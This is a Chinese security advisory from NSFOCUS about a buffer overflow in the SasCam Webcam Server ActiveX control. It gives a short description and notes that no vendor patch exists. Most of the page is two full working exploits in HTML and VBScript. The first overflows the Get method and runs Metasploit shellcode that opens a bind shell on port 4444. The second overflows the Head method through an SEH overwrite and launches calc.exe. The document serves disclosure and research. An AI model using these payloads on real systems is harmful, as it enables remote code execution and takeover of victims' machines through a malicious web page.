安全研究

安全漏洞
SasCam Webcam Server ActiveX控件Get方式缓冲区溢出漏洞

发布日期:2008-12-29
更新日期:2008-12-30

受影响系统:
SaschArt SasCam WebCam Server 2.6.5
描述:
BUGTRAQ  ID: 33053

SasCam Webcam Server是用于从桌面或站点播放、广播视频流的工具。

Webcam Server ActiveX控件没有正确地验证对Get方式所传送的超长字符串,如果用户受骗访问了恶意网页并向该方式传送了超长参数的话,就可以触发缓冲区溢出,导致执行任意指令。

<*来源:callAX (callax@shellcode.com.ar
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>
<object classid='clsid:0297D24A-F425-47EE-9F3B-A459BCE593E3' id='cr4sh'></object>
<input language=VBScript onclick=rootIT() type=button value="3xpl0iT-IT!">
<script language = 'vbscript'>
Sub rootIT()
                                                        
  put_s0m3_shit  = String(8293, "a")  

  eip               = unescape("%EC%7E%E3%77") // call esp User32.dll Module 77 E3 7E EC

  noping            = String(20, unescape("%90"))

<!-- This exploit opens the port 4444. Thanks to Metasploit for Shellcode -->

lnj3ctc0d3 =  unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
               unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
               unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
               unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
               unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4c%56%4b%4e") & _
               unescape("%4d%54%4a%4e%49%4f%4f%4f%4f%4f%4f%4f%42%56%4b%48") & _
               unescape("%4e%56%46%32%46%32%4b%38%45%44%4e%53%4b%58%4e%37") & _
               unescape("%45%30%4a%57%41%30%4f%4e%4b%48%4f%34%4a%51%4b%58") & _
               unescape("%4f%35%42%52%41%50%4b%4e%49%54%4b%48%46%53%4b%48") & _
               unescape("%41%50%50%4e%41%33%42%4c%49%59%4e%4a%46%38%42%4c") & _
               unescape("%46%37%47%50%41%4c%4c%4c%4d%30%41%30%44%4c%4b%4e") & _
               unescape("%46%4f%4b%53%46%55%46%42%4a%52%45%57%45%4e%4b%58") & _
               unescape("%4f%35%46%32%41%30%4b%4e%48%56%4b%58%4e%30%4b%44") & _
               unescape("%4b%58%4f%55%4e%51%41%50%4b%4e%43%50%4e%32%4b%48") & _
               unescape("%49%38%4e%56%46%42%4e%31%41%46%43%4c%41%53%4b%4d") & _
               unescape("%46%36%4b%58%43%54%42%43%4b%48%42%44%4e%50%4b%58") & _
               unescape("%42%47%4e%51%4d%4a%4b%38%42%54%4a%30%50%35%4a%56") & _
               unescape("%50%48%50%54%50%30%4e%4e%42%55%4f%4f%48%4d%48%46") & _
               unescape("%43%35%48%56%4a%36%43%33%44%53%4a%46%47%47%43%37") & _
               unescape("%44%43%4f%45%46%55%4f%4f%42%4d%4a%46%4b%4c%4d%4e") & _
               unescape("%4e%4f%4b%43%42%55%4f%4f%48%4d%4f%35%49%48%45%4e") & _
               unescape("%48%56%41%38%4d%4e%4a%30%44%50%45%45%4c%36%44%50") & _
               unescape("%4f%4f%42%4d%4a%46%49%4d%49%50%45%4f%4d%4a%47%55") & _
               unescape("%4f%4f%48%4d%43%55%43%35%43%35%43%55%43%45%43%54") & _
               unescape("%43%55%43%54%43%45%4f%4f%42%4d%48%56%4a%56%41%41") & _
               unescape("%4e%45%48%46%43%55%49%48%41%4e%45%39%4a%36%46%4a") & _
               unescape("%4c%31%42%37%47%4c%47%55%4f%4f%48%4d%4c%46%42%41") & _
               unescape("%41%55%45%35%4f%4f%42%4d%4a%46%46%4a%4d%4a%50%32") & _
               unescape("%49%4e%47%35%4f%4f%48%4d%43%55%45%55%4f%4f%42%4d") & _
               unescape("%4a%36%45%4e%49%34%48%48%49%54%47%45%4f%4f%48%4d") & _
               unescape("%42%35%46%35%46%55%45%45%4f%4f%42%4d%43%39%4a%46") & _
               unescape("%47%4e%49%37%48%4c%49%57%47%35%4f%4f%48%4d%45%45") & _
               unescape("%4f%4f%42%4d%48%56%4c%36%46%56%48%56%4a%46%43%46") & _
               unescape("%4d%56%49%38%45%4e%4c%56%42%45%49%35%49%42%4e%4c") & _
               unescape("%49%38%47%4e%4c%46%46%54%49%38%44%4e%41%33%42%4c") & _
               unescape("%43%4f%4c%4a%50%4f%44%54%4d%32%50%4f%44%44%4e%32") & _
               unescape("%43%49%4d%58%4c%57%4a%53%4b%4a%4b%4a%4b%4a%4a%46") & _
               unescape("%44%57%50%4f%43%4b%48%41%4f%4f%45%57%46%44%4f%4f") & _
               unescape("%48%4d%4b%55%47%55%44%55%41%45%41%45%41%45%4c%56") & _
               unescape("%41%30%41%45%41%35%45%45%41%45%4f%4f%42%4d%4a%46") & _
               unescape("%4d%4a%49%4d%45%30%50%4c%43%45%4f%4f%48%4d%4c%36") & _
               unescape("%4f%4f%4f%4f%47%43%4f%4f%42%4d%4b%38%47%35%4e%4f") & _
               unescape("%43%38%46%4c%46%46%4f%4f%48%4d%44%55%4f%4f%42%4d") & _
               unescape("%4a%46%42%4f%4c%58%46%30%4f%45%43%35%4f%4f%48%4d") & _
               unescape("%4f%4f%42%4d%5a")

  this_is_my_gift = put_s0m3_shit + eip + noping + lnj3ctc0d3

  cr4sh.Get this_is_my_gift

End Sub

</script>
<html>


# Exploit Title: SasCam 2.7 ActiveX Head Buffer Overflow  

# Date: July 4, 2010  

# Author: Blake  

# Software Link:http://download.cnet.com/SasCam-Webcam-Server/3000-2348_4-10491197.html  

# Version: 2.7  

# Tested on: Windows XP SP3 / IE6 and 7  

  

<html>  

<object classid='clsid:0297D24A-F425-47EE-9F3B-A459BCE593E3'  

id='target'></object>  

<script language='vbscript'>  

  

'for debugging/custom prolog  

'targetFile = "C:\Program Files\SasCam_free\XHTTP.dll"  

'prototype  = "Sub Head ( ByVal sURL As String )"  

'memberName = "Head"  

'progid     = "XHTTP.HTTP"  

'argCount   = 1  

  

'EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2  

sc = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%48%49") & _  

unescape("%49%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%68") & _  

unescape("%58%50%30%42%31%42%41%6b%41%41%78%32%41%42%32%42") & _  

unescape("%41%30%42%41%41%58%38%41%42%50%75%59%79%39%6c%4a") & _  

unescape("%48%50%44%63%30%35%50%43%30%4c%4b%57%35%77%4c%4c") & _  

unescape("%4b%51%6c%35%55%64%38%77%71%6a%4f%4c%4b%62%6f%45") & _  

unescape("%48%4e%6b%31%4f%45%70%55%51%6a%4b%73%79%6e%6b%70") & _  

unescape("%34%6c%4b%46%61%7a%4e%70%31%4b%70%4e%79%6e%4c%6c") & _  

unescape("%44%49%50%52%54%67%77%5a%61%59%5a%34%4d%55%51%6f") & _  

unescape("%32%4a%4b%79%64%37%4b%51%44%41%34%35%54%71%65%6d") & _  

unescape("%35%4e%6b%53%6f%47%54%65%51%4a%4b%31%76%4e%6b%46") & _  

unescape("%6c%30%4b%6e%6b%51%4f%75%4c%54%41%58%6b%4c%4b%77") & _  

unescape("%6c%6e%6b%66%61%58%6b%6d%59%33%6c%46%44%46%64%6a") & _  

unescape("%63%35%61%6b%70%71%74%6e%6b%63%70%54%70%6f%75%6f") & _  

unescape("%30%54%38%56%6c%4c%4b%61%50%36%6c%4e%6b%34%30%35") & _  

unescape("%4c%4c%6d%6e%6b%43%58%75%58%58%6b%54%49%4c%4b%4d") & _  

unescape("%50%6c%70%43%30%57%70%55%50%6e%6b%32%48%35%6c%71") & _  

unescape("%4f%67%41%6b%46%53%50%56%36%6b%39%48%78%4d%53%4f") & _  

unescape("%30%71%6b%32%70%33%58%4c%30%4d%5a%56%64%43%6f%52") & _  

unescape("%48%6a%38%4b%4e%4c%4a%66%6e%31%47%4b%4f%6b%57%61") & _  

unescape("%73%70%61%30%6c%71%73%64%6e%70%65%73%48%72%45%35") & _  

unescape("%50%68")  

  

buffer = String(8349, "A")  

next_seh = unescape("%eb%06%90%90")  

seh = unescape("%56%29%d1%72")                ' 0x72D12956 [msacm32.drv]  

nops = String(20, unescape("%90"))                  ' nop sled  

junk = String(4151, "B")  

  

exploit = buffer + next_seh + seh + nops + sc + junk  

target.Head exploit  

  

</script>

建议:
厂商补丁:

SaschArt
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://soft.saschart.com/

浏览次数:2911
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客